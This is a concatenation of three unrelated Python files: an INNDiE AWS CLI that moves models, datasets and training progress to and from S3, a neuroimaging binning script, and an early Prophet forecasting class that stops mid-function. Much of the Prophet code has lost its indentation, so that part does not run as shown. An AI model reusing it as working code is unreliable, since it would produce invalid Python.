    key = "inndie-datasets/" + os.path.basename(dataset_path)
    s3.download_file(bucket_name, key, dataset_path)
    print(f"Downloaded from: {key}\n")
def impl_update_training_progress(job_id, progress_text, bucket_name, region):
    """
    Updates the training progress in S3 for a model specified by its name.
    :param job_id: The unique Job ID.
    :param progress_text: The text to write into the progress file.
    :param bucket_name: The S3 bucket name.
    :param region: The region, or `None` to pull the region from the environment.
    """
    client = make_client("s3", region)
    remote_path = create_progress_prefix(job_id) + "/progress.txt"
    # Upload the text directly instead of round-tripping through a temp file on
    # disk, matching how the heartbeat and log-file helpers write their objects.
    client.put_object(Body=progress_text, Bucket=bucket_name, Key=remote_path)
    print("Updated progress in: {}\n".format(remote_path))
def impl_create_heartbeat(job_id, bucket_name, region):
    """
    Creates a heartbeat that INNDiE uses to check if the training script is running properly.
    :param job_id: The unique Job ID.
    :param bucket_name: The S3 bucket name.
    :param region: The region, or `None` to pull the region from the environment.
    """
    s3 = make_client("s3", region)
    # "1" marks the heartbeat as alive.
    heartbeat_key = create_progress_prefix(job_id) + "/heartbeat.txt"
    s3.put_object(Body="1", Bucket=bucket_name, Key=heartbeat_key)
    print(f"Created heartbeat file in: {heartbeat_key}\n")
def impl_remove_heartbeat(job_id, bucket_name, region):
    """
    Removes a heartbeat that INNDiE uses to check if the training script is running properly.
    :param job_id: The unique Job ID.
    :param bucket_name: The S3 bucket name.
    :param region: The region, or `None` to pull the region from the environment.
    """
    s3 = make_client("s3", region)
    # "0" marks the heartbeat as stopped (the object is overwritten, not deleted).
    heartbeat_key = create_progress_prefix(job_id) + "/heartbeat.txt"
    s3.put_object(Body="0", Bucket=bucket_name, Key=heartbeat_key)
    print(f"Removed heartbeat file in: {heartbeat_key}\n")
def impl_set_training_log_file(job_id, log_file, bucket_name, region):
    """
    Sets the training log file contents to the contents of the log file.
    :param job_id: The unique Job ID.
    :param log_file: The log file to read from.
    :param bucket_name: The S3 bucket name.
    :param region: The region, or `None` to pull the region from the environment.
    """
    s3 = make_client("s3", region)
    log_key = create_progress_prefix(job_id) + "/log.txt"
    with open(log_file, "r") as handle:
        contents = handle.read()
    s3.put_object(Body=contents, Bucket=bucket_name, Key=log_key)
    print(f"Set training log file in: {log_key}\n")
def impl_upload_training_results(job_id, output_dir, bucket_name, region):
    """
    Uploads all files (not directories) in output_dir to S3.
    :param job_id: The unique Job ID.
    :param output_dir: The directory containing the result files.
    :param bucket_name: The S3 bucket name.
    :param region: The region, or `None` to pull the region from the environment.
    """
    s3 = make_client("s3", region)
    candidates = (os.path.join(output_dir, name) for name in os.listdir(output_dir))
    for path in (p for p in candidates if os.path.isfile(p)):
        extension = os.path.splitext(path)[1].lower()
        # Upload model files to the model prefix instead of the test result prefix so that users
        # can select them as models to start new Jobs with.
        if extension in (".h5", ".hdf5"):
            impl_upload_model(os.path.abspath(path), bucket_name, region)
        else:
            key = "inndie-training-results/{}/{}".format(job_id, os.path.basename(path))
            s3.upload_file(path, bucket_name, key)
            print("Uploaded to: {}\n".format(key))
def create_progress_prefix(job_id):
    """Return the S3 key prefix under which a job's progress artifacts are stored."""
    return f"inndie-training-progress/{job_id}"
@click.group()
def cli():
    """Entry point for the INNDiE AWS CLI; subcommands are registered below."""
    return

# Regions offered by the --region option on every subcommand.
region_choices = ['us-east-1', 'us-east-2', 'us-west-1', 'us-west-2', 'ca-central-1',
                  'eu-central-1', 'eu-west-1', 'eu-west-2', 'eu-west-3',
                  'eu-north-1', 'ap-east-1', 'ap-south-1', 'ap-northeast-1',
                  'ap-northeast-2', 'ap-northeast-3', 'ap-southeast-1',
                  'ap-southeast-2', 'me-south-1', 'sa-east-1']
# --- CLI wrappers -------------------------------------------------------------
# Each command below is a thin click wrapper that resolves the managed S3 bucket
# (ensure_s3_bucket) and delegates to its impl_* counterpart.
@cli.command(name="ensure-configuration")
@click.option("--region", help="The region to connect to.",
              type=click.Choice(region_choices))
def ensure_configuration(region):
    """
    Ensures that AWS is configured for INNDiE.
    """
    impl_ensure_configuration(region)

@cli.command(name="upload-model")
@click.argument("model-path")
@click.option("--region", help="The region to connect to.",
              type=click.Choice(region_choices))
def upload_model(model_path, region):
    """
    Uploads a model from a local file.
    MODEL_PATH The path to the model to upload, ending with the name of the model.
    """
    impl_upload_model(model_path, ensure_s3_bucket(region), region)

@cli.command(name="download-model")
@click.argument("model-path")
@click.option("--region", help="The region to connect to.",
              type=click.Choice(region_choices))
def download_model(model_path, region):
    """
    Downloads a model to a local file.
    MODEL_PATH The path to download the model to, ending with the name of the model.
    """
    impl_download_model(model_path, ensure_s3_bucket(region), region)

@cli.command(name="download-training-script")
@click.argument("script-path")
@click.option("--region", help="The region to connect to.",
              type=click.Choice(region_choices))
def download_training_script(script_path, region):
    """
    Downloads a training script.
    SCRIPT_PATH The path to download the script to, ending with the name of the script.
    """
    impl_download_training_script(script_path, ensure_s3_bucket(region), region)

@cli.command(name="upload-dataset")
@click.argument("dataset-path")
@click.option("--region", help="The region to connect to.",
              type=click.Choice(region_choices))
def upload_dataset(dataset_path, region):
    """
    Uploads a dataset.
    DATASET_PATH The path to the dataset to upload, ending with the name of the dataset.
    """
    impl_upload_dataset(dataset_path, ensure_s3_bucket(region), region)

@cli.command(name="download-dataset")
@click.argument("dataset-path")
@click.option("--region", help="The region to connect to.",
              type=click.Choice(region_choices))
def download_dataset(dataset_path, region):
    """
    Downloads a dataset.
    DATASET_PATH The path to download the dataset to, ending with the name of the dataset.
    """
    impl_download_dataset(dataset_path, ensure_s3_bucket(region), region)
# --- CLI wrappers (training progress) -----------------------------------------
# Thin click wrappers used by the running training script to report status back
# to INNDiE through S3; each delegates to its impl_* counterpart.
@cli.command(name="update-training-progress")
@click.argument("job-id")
@click.argument("progress-text")
@click.option("--region", help="The region to connect to.",
              type=click.Choice(region_choices))
def update_training_progress(job_id, progress_text, region):
    """
    Updates the training progress. Meant to be used while a training script is running to provide
    progress updates to INNDiE.
    JOB_ID The unique Job ID.
    PROGRESS_TEXT The text to write to the progress file.
    """
    impl_update_training_progress(job_id, progress_text, ensure_s3_bucket(region),
                                  region)

@cli.command(name="create-heartbeat")
@click.argument("job-id")
@click.option("--region", help="The region to connect to.",
              type=click.Choice(region_choices))
def create_heartbeat(job_id, region):
    """
    Creates a heartbeat that INNDiE uses to check if the training script is running properly.
    JOB_ID The unique Job ID.
    """
    impl_create_heartbeat(job_id, ensure_s3_bucket(region), region)

@cli.command(name="remove-heartbeat")
@click.argument("job-id")
@click.option("--region", help="The region to connect to.",
              type=click.Choice(region_choices))
def remove_heartbeat(job_id, region):
    """
    Removes a heartbeat that INNDiE uses to check if the training script is running properly.
    JOB_ID The unique Job ID.
    """
    impl_remove_heartbeat(job_id, ensure_s3_bucket(region), region)

@cli.command(name="set-training-log-file")
@click.argument("job-id")
@click.argument("log-file")
@click.option("--region", help="The region to connect to.",
              type=click.Choice(region_choices))
def set_training_log_file(job_id, log_file, region):
    """
    Sets the training log file contents to the contents of the log file.
    JOB_ID The unique Job ID.
    LOG_FILE The log file to read from.
    """
    impl_set_training_log_file(job_id, log_file, ensure_s3_bucket(region), region)

@cli.command(name="upload-training-results")
@click.argument("job-id")
@click.argument("output-dir")
@click.option("--region", help="The region to connect to.",
              type=click.Choice(region_choices))
def upload_training_results(job_id, output_dir, region):
    """
    Uploads the results from running a training script.
    JOB_ID The unique Job ID.
    OUTPUT_DIR The directory containing the results.
    """
    impl_upload_training_results(job_id, output_dir, ensure_s3_bucket(region), region)
|
<gh_stars>0
#!/usr/bin/env python
"""
Discretizes a continuous variable
"""
from loguru import logger
from mcot.core import scripts
import numpy as np
import colorcet as cc
from mcot.core.cifti import combine
def run_array(arr, nbins, bins=None, weight=None, include_zeros=False):
    """
    Returns a discretised version of the input array

    :param arr: nibabel input image
    :param nbins: number of bins to extract
    :param bins: one of the following

        - None: use weight to set the bins
        - 'number': each parcel will have the same number of elements
        - 'regular': split the range from min to max in the input into equal bins
        - 1D array: explicit boundaries
    :param weight: selects the bins so each parcel has the same sum in this image (only used if bins is None)
    :param include_zeros: if True include zeros in the analysis
    :return: tuple with:

        - array with the parcels (zero where the original array was zero)
        - (nbins + 1, ...) array with the applied boundaries
    """
    if weight is not None and arr.shape[:weight.ndim] != weight.shape:
        raise ValueError("Shape of weight image does not match input image")
    res = np.zeros(arr.shape, dtype='i4')
    # One set of bin edges per trailing (non-weight) index; scalar case gets a single set.
    all_bins = np.zeros((nbins + 1, ) + (() if weight is None else arr.shape[weight.ndim:]))
    for idx in np.ndindex(*(() if weight is None else arr.shape[weight.ndim:])):
        sub_arr = arr[(Ellipsis, ) + idx]
        # By default zeros are treated as background and excluded from binning.
        mask = slice(None) if include_zeros else sub_arr != 0
        if weight is not None:
            if (np.array(idx) == 0).all():
                logger.info('Using weight file to set bins')
            # Choose edges so that each bin carries (approximately) equal total weight:
            # walk the cumulative weight of the sorted values and cut at equal fractions.
            idx_sorted = np.argsort(sub_arr[mask])
            values = np.append(0, np.cumsum(weight[mask][idx_sorted]))
            edges = np.floor(np.interp(
                np.linspace(0, values[-1], nbins + 1)[1:-1],
                values,
                np.arange(values.size),
            )).astype('int')
            use_bins_mid = sub_arr[mask][idx_sorted][edges]
            # Outermost edges are +-inf so every value falls inside some bin.
            use_bins = np.append(-np.inf, np.append(use_bins_mid, np.inf))
        elif bins == 'regular':
            if (np.array(idx) == 0).all():
                logger.info('Using regularly spaced bins')
            use_bins = np.linspace(sub_arr.min(), sub_arr.max(), nbins + 1)
        elif bins == 'number':
            if (np.array(idx) == 0).all():
                logger.info('Setting bins to have identical number of elements in parcels')
            # Take edges from the sorted data at evenly spaced ranks.
            use_bins = np.sort(sub_arr[mask])[np.around(np.linspace(0, sub_arr[mask].size - 1, nbins + 1)).astype('i4')]
        else:
            # Explicit boundaries supplied by the caller; np.array() copies, so the
            # in-place edge tweak below never mutates the caller's array.
            use_bins = np.array(bins)
        assert use_bins.size == nbins + 1
        logger.debug(f'Bins for {idx}: {use_bins}')
        # Store the unshifted edges before nudging the top edge.
        all_bins[(Ellipsis, ) + idx] = use_bins
        # np.digitize bins are half-open [lo, hi); nudge the top edge up so the
        # maximum value lands in the last bin instead of bin nbins + 1.
        use_bins[-1] += 1e-8
        res[(Ellipsis, ) + idx][mask] = np.digitize(sub_arr[mask], use_bins)
    return res, all_bins
def run_from_args(args):
    """
    Runs the script based on a Namespace containing the command line arguments
    """
    arr, axes = args.input
    bins, weight = None, None
    # Exactly one binning strategy is selected (the options are mutually exclusive).
    if args.equal_weight:
        weight, axes_weight = args.equal_weight
        # Reduce both images to their common greyordinates before weighting.
        bm, (idx_arr, idx_weight) = combine([axes[-1], axes_weight[-1]])
        axes = axes[:-1] + (bm, )
        arr = arr[..., idx_arr]
        weight = weight[..., idx_weight]
    elif args.equal_number:
        bins = 'number'
    elif args.equal_bin:
        bins = 'regular'
    elif args.set_bin:
        # Explicit edges: if only the interior edges were given, pad with +-inf.
        if len(args.set_bin) == args.nbins - 1:
            args.set_bin = np.append(-np.inf, np.append(args.set_bin, np.inf))
        assert len(args.set_bin) == args.nbins + 1
        bins = args.set_bin
    else:
        raise ValueError("No binning method selected")
    res, used_bins = run_array(
        arr, args.nbins, bins=bins, weight=weight, include_zeros=args.include_zeros
    )
    # Label each parcel with its bin range and a distinct glasbey colour.
    labels = [{int(idx): (f'{start:.2f} to {end:.2f}', c) for idx, start, end, c in zip(
        range(1, 100), used_bins[:-1], used_bins[1:], cc.glasbey)}]
    new_axes = (axes[0].to_label(labels), ) + axes[1:]
    args.output((res, new_axes))
def add_to_parser(parser):
    """
    Creates the parser of the command line arguments
    """
    parser.add_argument('input', type=scripts.greyordinate_in,
                        help='input NIFTI/GIFTI/CIFTI file')
    parser.add_argument('output', type=scripts.output,
                        help='output NIFTI/GIFTI/CIFTI files')
    parser.add_argument('nbins', type=int, help='number of bins')
    # Bug fix: this is a boolean flag (run_from_args passes it straight
    # through as include_zeros); without action='store_true' argparse would
    # require a value after -i0, contradicting the help text and the other
    # flags in this parser.
    parser.add_argument('-i0', '--include_zeros', action='store_true',
                        help='Include zeros in the analysis (always true for CIFTI)')
    grp = parser.add_mutually_exclusive_group()
    grp.add_argument('--equal_weight', type=scripts.greyordinate_in,
                     help='Each bin will contain the same total weight of given file')
    grp.add_argument('--equal_number', action='store_true',
                     help='Each bin will contain the same number of elements')
    grp.add_argument('--equal_bin', action='store_true',
                     help='Each bin will have the same size (from min to max value)')
    grp.add_argument('--set_bin', nargs='*', type=float,
                     help='Manually sets the edges of the bins as a sequence of numbers')
|
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from collections import defaultdict
from datetime import timedelta
import pickle
from matplotlib import pyplot as plt
from matplotlib.dates import DateFormatter, MonthLocator
from matplotlib.ticker import MaxNLocator
import numpy as np
import pandas as pd
# fb-block 1 start
import pkg_resources
# fb-block 1 end
try:
import pystan
except ImportError:
print('You cannot run prophet without pystan installed')
raise
# fb-block 2
class Prophet(object):
    def __init__(
        self,
        growth='linear',
        changepoints=None,
        n_changepoints=25,
        yearly_seasonality=True,
        weekly_seasonality=True,
        holidays=None,
        seasonality_prior_scale=10.0,
        holidays_prior_scale=10.0,
        changepoint_prior_scale=0.05,
        mcmc_samples=0,
        interval_width=0.80,
        uncertainty_samples=1000,
    ):
        """Prophet forecaster.

        Parameters
        ----------
        growth: 'linear' or 'logistic' trend.
        changepoints: optional list of dates of potential changepoints;
            if None they are selected automatically in set_changepoints.
        n_changepoints: number of automatic changepoints (ignored when
            `changepoints` is supplied).
        yearly_seasonality, weekly_seasonality: whether to fit these.
        holidays: optional pd.DataFrame with 'ds' and 'holiday' columns
            (optionally 'lower_window'/'upper_window' — see validate_inputs).
        seasonality_prior_scale, holidays_prior_scale,
        changepoint_prior_scale: strengths of the corresponding priors.
        mcmc_samples: if > 0, full MCMC sampling with this many samples;
            otherwise MAP optimization.
        interval_width: width of the returned uncertainty intervals.
        uncertainty_samples: number of simulated draws for intervals.
        """
        self.growth = growth

        # pd.to_datetime(None) is None, so this stays None when unset.
        self.changepoints = pd.to_datetime(changepoints)
        if self.changepoints is not None:
            # Explicit changepoints override n_changepoints.
            self.n_changepoints = len(self.changepoints)
        else:
            self.n_changepoints = n_changepoints

        self.yearly_seasonality = yearly_seasonality
        self.weekly_seasonality = weekly_seasonality

        if holidays is not None:
            if not (
                isinstance(holidays, pd.DataFrame)
                and 'ds' in holidays
                and 'holiday' in holidays
            ):
                raise ValueError("holidays must be a DataFrame with 'ds' and "
                                 "'holiday' columns.")
            # NOTE(review): this mutates the caller's DataFrame in place.
            holidays['ds'] = pd.to_datetime(holidays['ds'])
        self.holidays = holidays

        self.seasonality_prior_scale = float(seasonality_prior_scale)
        self.changepoint_prior_scale = float(changepoint_prior_scale)
        self.holidays_prior_scale = float(holidays_prior_scale)

        self.mcmc_samples = mcmc_samples
        self.interval_width = interval_width
        self.uncertainty_samples = uncertainty_samples

        # Set during fitting
        self.start = None           # earliest timestamp in the history
        self.y_scale = None         # max(y); used to scale the series
        self.t_scale = None         # span of the history in time
        self.changepoints_t = None  # changepoints in scaled [0, 1] time
        self.stan_fit = None
        self.params = {}
        self.history = None
        self.validate_inputs()
def validate_inputs(self):
if self.growth not in ('linear', 'logistic'):
raise ValueError(
"Parameter 'growth' should be 'linear' or 'logistic'.")
if self.holidays is not None:
has_lower = 'lower_window' in self.holidays
has_upper = 'upper_window' in self.holidays
if has_lower + has_upper == 1:
raise ValueError('Holidays must have both lower_window and ' +
'upper_window, or neither')
if has_lower:
if max(self.holidays['lower_window']) > 0:
raise ValueError('Holiday lower_window should be <= 0')
if min(self.holidays['upper_window']) < 0:
raise ValueError('Holiday upper_window should be >= 0')
for h in self.holidays['holiday'].unique():
if '_delim_' in h:
raise ValueError('Holiday name cannot contain "_delim_"')
if h in ['zeros', 'yearly', 'weekly', 'yhat', 'seasonal',
'trend']:
raise ValueError('Holiday name {} reserved.'.format(h))
@classmethod
def get_linear_model(cls):
# fb-block 3
# fb-block 4 start
model_file = pkg_resources.resource_filename(
'fbprophet',
'stan_models/linear_growth.pkl'
)
# fb-block 4 end
with open(model_file, 'rb') as f:
return pickle.load(f)
@classmethod
def get_logistic_model(cls):
# fb-block 5
# fb-block 6 start
model_file = pkg_resources.resource_filename(
'fbprophet',
'stan_models/logistic_growth.pkl'
)
# fb-block 6 end
with open(model_file, 'rb') as f:
return pickle.load(f)
    def setup_dataframe(self, df, initialize_scales=False):
        """Create auxillary columns 't', 't_ix', 'y_scaled', and 'cap_scaled'.
        These columns are used during both fitting and prediction.
        """
        if 'y' in df:
            df['y'] = pd.to_numeric(df['y'])
        df['ds'] = pd.to_datetime(df['ds'])

        df = df.sort_values('ds')
        df.reset_index(inplace=True, drop=True)

        if initialize_scales:
            # Learn the scaling constants from this (training) dataframe.
            self.y_scale = df['y'].max()
            self.start = df['ds'].min()
            self.t_scale = df['ds'].max() - self.start

        # Time rescaled so the training period maps onto [0, 1].
        df['t'] = (df['ds'] - self.start) / self.t_scale
        if 'y' in df:
            df['y_scaled'] = df['y'] / self.y_scale

        if self.growth == 'logistic':
            # Logistic growth needs a carrying capacity per row.
            assert 'cap' in df
            df['cap_scaled'] = df['cap'] / self.y_scale
        return df
def set_changepoints(self):
"""Generate a list of changepoints.
Either:
1) the changepoints were passed in explicitly
A) they are empty
B) not empty, needs validation
2) we are generating a grid of them
3) the user prefers no changepoints to be used
"""
if self.changepoints is not None:
if len(self.changepoints) == 0:
pass
else:
too_low = min(self.changepoints) < self.history['ds'].min()
too_high = max(self.changepoints) > self.history['ds'].max()
if too_low or too_high:
raise ValueError('Changepoints must fall within training data.')
elif self.n_changepoints > 0:
# Place potential changepoints evenly throuh first 80% of history
max_ix = np.floor(self.history.shape[0] * 0.8)
cp_indexes = (
np.linspace(0, max_ix, self.n_changepoints + 1)
.round()
.astype(np.int)
)
self.changepoints = self.history.ix[cp_indexes]['ds'].tail(-1)
else:
# set empty changepoints
self.changepoints = []
if len(self.changepoints) > 0:
self.changepoints_t = np.sort(np.array(
(self.changepoints - self.start) / self.t_scale))
else:
self.changepoints_t = np.array([0]) # dummy changepoint
def get_changepoint_matrix(self):
A = np.zeros((self.history.shape[0], len(self.changepoints_t)))
for i, t_i in enumerate(self.changepoints_t):
A[self.history['t'].values >= t_i, i] = 1
return A
@staticmethod
def fourier_series(dates, period, series_order):
"""Generate a Fourier expansion for a fixed frequency and order.
Parameters
----------
dates: a pd.Series containing timestamps
period: an integer frequency (number of days)
series_order: number of components to generate
Returns
-------
a 2-dimensional np.array with one row per row in `dt`
"""
# convert to days since epoch
t = np.array(
(dates - pd.datetime(1970, 1, 1))
.dt.days
.astype(np.float)
)
return np.column_stack([
fun((2.0 * (i + 1) * np.pi * t / period))
for i in range(series_order)
for fun in (np.sin, np.cos)
])
@classmethod
def make_seasonality_features(cls, dates, period, series_order, prefix):
features = cls.fourier_series(dates, period, series_order)
columns = [
'{}_delim_{}'.format(prefix, i + 1)
for i in range(features.shape[1])
]
return pd.DataFrame(features, columns=columns)
    def make_holiday_features(self, dates):
        """Generate a DataFrame with each column corresponding to a holiday.

        Each holiday occurrence (expanded over its lower/upper window) gets
        a column named '<holiday>_delim_<+/-><offset>', with scale_ratio at
        the rows where it applies and 0 elsewhere.
        """
        # A smaller prior scale will shrink holiday estimates more
        scale_ratio = self.holidays_prior_scale / self.seasonality_prior_scale
        # Holds columns of our future matrix.
        expanded_holidays = defaultdict(lambda: np.zeros(dates.shape[0]))
        # Makes an index so we can perform `get_loc` below.
        row_index = pd.DatetimeIndex(dates)

        for ix, row in self.holidays.iterrows():
            dt = row.ds.date()
            try:
                lw = int(row.get('lower_window', 0))
                uw = int(row.get('upper_window', 0))
            except ValueError:
                # Non-numeric window entries fall back to no window.
                lw = 0
                uw = 0
            for offset in range(lw, uw + 1):
                occurrence = dt + timedelta(days=offset)
                try:
                    loc = row_index.get_loc(occurrence)
                except KeyError:
                    # Occurrence is outside the requested dates.
                    loc = None
                key = '{}_delim_{}{}'.format(
                    row.holiday,
                    '+' if offset >= 0 else '-',
                    abs(offset)
                )
                if loc is not None:
                    expanded_holidays[key][loc] = scale_ratio
                else:
                    # Access key to generate value
                    expanded_holidays[key]
        # This relies pretty importantly on pandas keeping the columns in order.
        return pd.DataFrame(expanded_holidays)
def make_all_seasonality_features(self, df):
seasonal_features = [
# Add a column of zeros in case no seasonality is used.
pd.DataFrame({'zeros': np.zeros(df.shape[0])})
]
# Seasonality features
if self.yearly_seasonality:
seasonal_features.append(self.make_seasonality_features(
df['ds'],
365.25,
10,
'yearly',
))
if self.weekly_seasonality:
seasonal_features.append(self.make_seasonality_features(
df['ds'],
7,
3,
'weekly',
))
if self.holidays is not None:
seasonal_features.append(self.make_holiday_features(df['ds']))
return pd.concat(seasonal_features, axis=1)
@staticmethod
def linear_growth_init(df):
i0, i1 = df['ds'].idxmin(), df['ds'].idxmax()
T = df['t'].ix[i1] - df['t'].ix[i0]
k = (df['y_scaled'].ix[i1] - df['y_scaled'].ix[i0]) / T
m = df['y_scaled'].ix[i0] - k * df['t'].ix[i0]
return (k, m)
@staticmethod
def logistic_growth_init(df):
i0, i1 = df['ds'].idxmin(), df['ds'].idxmax()
T = df['t'].ix[i1] - df['t'].ix[i0]
# Force valid values, in case y > cap.
r0 = max(1.01, df['cap_scaled'].ix[i0] / df['y_scaled'].ix[i0])
r1 = max(1.01, df['cap_scaled'].ix[i1] / df['y_scaled'].ix[i1])
if abs(r0 - r1) <= 0.01:
r0 = 1.05 * r0
L0 = np.log(r0 - 1)
L1 = np.log(r1 - 1)
# Initialize the offset
m = L0 * T / (L0 - L1)
# And the rate
k = L0 / m
return (k, m)
# fb-block 7
    def fit(self, df, **kwargs):
        """Fit the Prophet model to data.

        Parameters
        ----------
        df: pd.DataFrame containing history. Must have columns 'ds', 'y', and
            if logistic growth, 'cap'.
        kwargs: Additional arguments passed to Stan's sampling or optimizing
            function, as appropriate.

        Returns
        -------
        The fitted Prophet object.
        """
        # Drop rows with missing y before fitting.
        history = df[df['y'].notnull()].copy()
        history = self.setup_dataframe(history, initialize_scales=True)
        self.history = history

        seasonal_features = self.make_all_seasonality_features(history)

        self.set_changepoints()
        A = self.get_changepoint_matrix()

        # Data block handed to the Stan model.
        dat = {
            'T': history.shape[0],
            'K': seasonal_features.shape[1],
            'S': len(self.changepoints_t),
            'y': history['y_scaled'],
            't': history['t'],
            'A': A,
            't_change': self.changepoints_t,
            'X': seasonal_features,
            'sigma': self.seasonality_prior_scale,
            'tau': self.changepoint_prior_scale,
        }

        if self.growth == 'linear':
            kinit = self.linear_growth_init(history)
            model = self.get_linear_model()
        else:
            dat['cap'] = history['cap_scaled']
            kinit = self.logistic_growth_init(history)
            model = self.get_logistic_model()

        def stan_init():
            # Initial parameter values for the sampler / optimizer.
            return {
                'k': kinit[0],
                'm': kinit[1],
                'delta': np.zeros(len(self.changepoints_t)),
                'beta': np.zeros(seasonal_features.shape[1]),
                'sigma_obs': 1,
            }

        if self.mcmc_samples > 0:
            stan_fit = model.sampling(
                dat,
                init=stan_init,
                iter=self.mcmc_samples,
                **kwargs
            )
            for par in stan_fit.model_pars:
                self.params[par] = stan_fit[par]
        else:
            params = model.optimizing(dat, init=stan_init, iter=1e4, **kwargs)
            for par in params:
                # Reshape so MAP parameters look like one posterior draw.
                self.params[par] = params[par].reshape((1, -1))

            # If no changepoints were requested, replace delta with 0s
            # NOTE(review): `params` is only bound in this branch, so the
            # fold below cannot apply to the MCMC path — confirm intended.
            if len(self.changepoints) == 0:
                # Fold delta into the base rate k
                params['k'] = params['k'] + params['delta']
                params['delta'] = np.zeros(params['delta'].shape)
        return self
# fb-block 8
def predict(self, df=None):
"""Predict historical and future values for y.
Note: you must only pass in future dates here.
Historical dates are prepended before predictions are made.
`df` can be None, in which case we predict only on history.
"""
if df is None:
df = self.history.copy()
else:
df = self.setup_dataframe(df)
df['trend'] = self.predict_trend(df)
seasonal_components = self.predict_seasonal_components(df)
intervals = self.predict_uncertainty(df)
df2 = pd.concat((df, intervals, seasonal_components), axis=1)
df2['yhat'] = df2['trend'] + df2['seasonal']
return df2
@staticmethod
def piecewise_linear(t, deltas, k, m, changepoint_ts):
# Intercept changes
gammas = -changepoint_ts * deltas
# Get cumulative slope and intercept at each t
k_t = k * np.ones_like(t)
m_t = m * np.ones_like(t)
for s, t_s in enumerate(changepoint_ts):
indx = t >= t_s
k_t[indx] += deltas[s]
m_t[indx] += gammas[s]
return k_t * t + m_t
    @staticmethod
    def piecewise_logistic(t, cap, deltas, k, m, changepoint_ts):
        """Evaluate a piecewise logistic trend at times t.

        cap is the carrying capacity; deltas are rate adjustments at the
        changepoints; k and m are the base rate and offset.
        """
        # Compute offset changes
        # Cumulative rate in effect after each changepoint.
        k_cum = np.concatenate((np.atleast_1d(k), np.cumsum(deltas) + k))
        gammas = np.zeros(len(changepoint_ts))
        for i, t_s in enumerate(changepoint_ts):
            # Offset adjustment that keeps the curve continuous at t_s.
            gammas[i] = (
                (t_s - m - np.sum(gammas))
                * (1 - k_cum[i] / k_cum[i + 1])
            )
        # Get cumulative rate and offset at each t
        k_t = k * np.ones_like(t)
        m_t = m * np.ones_like(t)
        for s, t_s in enumerate(changepoint_ts):
            indx = t >= t_s
            k_t[indx] += deltas[s]
            m_t[indx] += gammas[s]
        return cap / (1 + np.exp(-k_t * (t - m_t)))
def predict_trend(self, df):
k = np.nanmean(self.params['k'])
m = np.nanmean(self.params['m'])
deltas = np.nanmean(self.params['delta'], axis=0)
t = np.array(df['t'])
if self.growth == 'linear':
trend = self.piecewise_linear(t, deltas, k, m, self.changepoints_t)
else:
cap = df['cap_scaled']
trend = self.piecewise_logistic(
t, cap, deltas, k, m, self.changepoints_t)
return trend * self.y_scale
def predict_seasonal_components(self, df):
seasonal_features = self.make_all_seasonality_features(df)
lower_p = 100 * (1.0 - self.interval_width) / 2
upper_p = 100 * (1.0 + self.interval_width) / 2
components = pd.DataFrame({
'col': np.arange(seasonal_features.shape[1]),
'component': [x.split('_delim_')[0] for x in seasonal_features.columns],
})
# Remove the placeholder
components = components[components['component'] != 'zeros']
if components.shape[0] > 0:
X = seasonal_features.as_matrix()
data = {}
for component, features in components.groupby('component'):
cols = features.col.tolist()
comp_beta = self.params['beta'][:, cols]
comp_features = X[:, cols]
comp = (
np.matmul(comp_features, comp_beta.transpose())
* self.y_scale
)
data[component] = np.nanmean(comp, axis=1)
data[component + '_lower'] = np.nanpercentile(comp, lower_p,
axis=1)
data[component + '_upper'] = np.nanpercentile(comp, upper_p,
axis=1)
component_predictions = pd.DataFrame(data)
component_predictions['seasonal'] = (
component_predictions[components['component'].unique()].sum(1))
else:
component_predictions = pd.DataFrame(
{'seasonal': np.zeros(df.shape[0])})
return component_predictions
    def predict_uncertainty(self, df):
        """Simulate from the posterior to produce lower/upper interval
        columns for yhat, trend and seasonal."""
        n_iterations = self.params['k'].shape[0]
        # Spread the requested number of samples over the posterior draws.
        samp_per_iter = max(1, int(np.ceil(
            self.uncertainty_samples / float(n_iterations)
        )))

        # Generate seasonality features once so we can re-use them.
        seasonal_features = self.make_all_seasonality_features(df)

        sim_values = {'yhat': [], 'trend': [], 'seasonal': []}
        for i in range(n_iterations):
            for j in range(samp_per_iter):
                sim = self.sample_model(df, seasonal_features, i)
                for key in sim_values:
                    sim_values[key].append(sim[key])

        lower_p = 100 * (1.0 - self.interval_width) / 2
        upper_p = 100 * (1.0 + self.interval_width) / 2

        series = {}
        for key, value in sim_values.items():
            # One column per simulation; percentiles taken across columns.
            mat = np.column_stack(value)
            series['{}_lower'.format(key)] = np.nanpercentile(mat, lower_p,
                                                              axis=1)
            series['{}_upper'.format(key)] = np.nanpercentile(mat, upper_p,
                                                              axis=1)

        return pd.DataFrame(series)
def sample_model(self, df, seasonal_features, iteration):
trend = self.sample_predictive_trend(df, iteration)
beta = self.params['beta'][iteration]
seasonal = np.matmul(seasonal_features.as_matrix(), beta) * self.y_scale
sigma = self.params['sigma_obs'][iteration]
noise = np.random.normal(0, sigma, df.shape[0]) * self.y_scale
return pd.DataFrame({
'yhat': trend + seasonal + noise,
'trend': trend,
'seasonal': seasonal,
})
    def sample_predictive_trend(self, df, iteration):
        """Draw one trend sample, simulating new changepoints beyond the
        training period. `iteration` selects the posterior draw of
        (k, m, delta) to use."""
        k = self.params['k'][iteration]
        m = self.params['m'][iteration]
        deltas = self.params['delta'][iteration]

        t = np.array(df['t'])
        T = t.max()

        # t > 1 corresponds to dates beyond the training window.
        if T > 1:
            # Get the time discretization of the history
            dt = np.diff(self.history['t'])
            dt = np.min(dt[dt > 0])
            # Number of time periods in the future
            N = np.ceil((T - 1) / float(dt))
            S = len(self.changepoints_t)
            # Historical changepoint frequency, capped at one per period.
            prob_change = min(1, (S * (T - 1)) / N)
            n_changes = np.random.binomial(N, prob_change)

            # Sample ts
            changepoint_ts_new = sorted(np.random.uniform(1, T, n_changes))
        else:
            # Case where we're not extrapolating.
            changepoint_ts_new = []
            n_changes = 0

        # Get the empirical scale of the deltas, plus epsilon to avoid NaNs.
        lambda_ = np.mean(np.abs(deltas)) + 1e-8

        # Sample deltas
        deltas_new = np.random.laplace(0, lambda_, n_changes)

        # Prepend the times and deltas from the history
        changepoint_ts = np.concatenate((self.changepoints_t,
                                         changepoint_ts_new))
        deltas = np.concatenate((deltas, deltas_new))

        if self.growth == 'linear':
            trend = self.piecewise_linear(t, deltas, k, m, changepoint_ts)
        else:
            cap = df['cap_scaled']
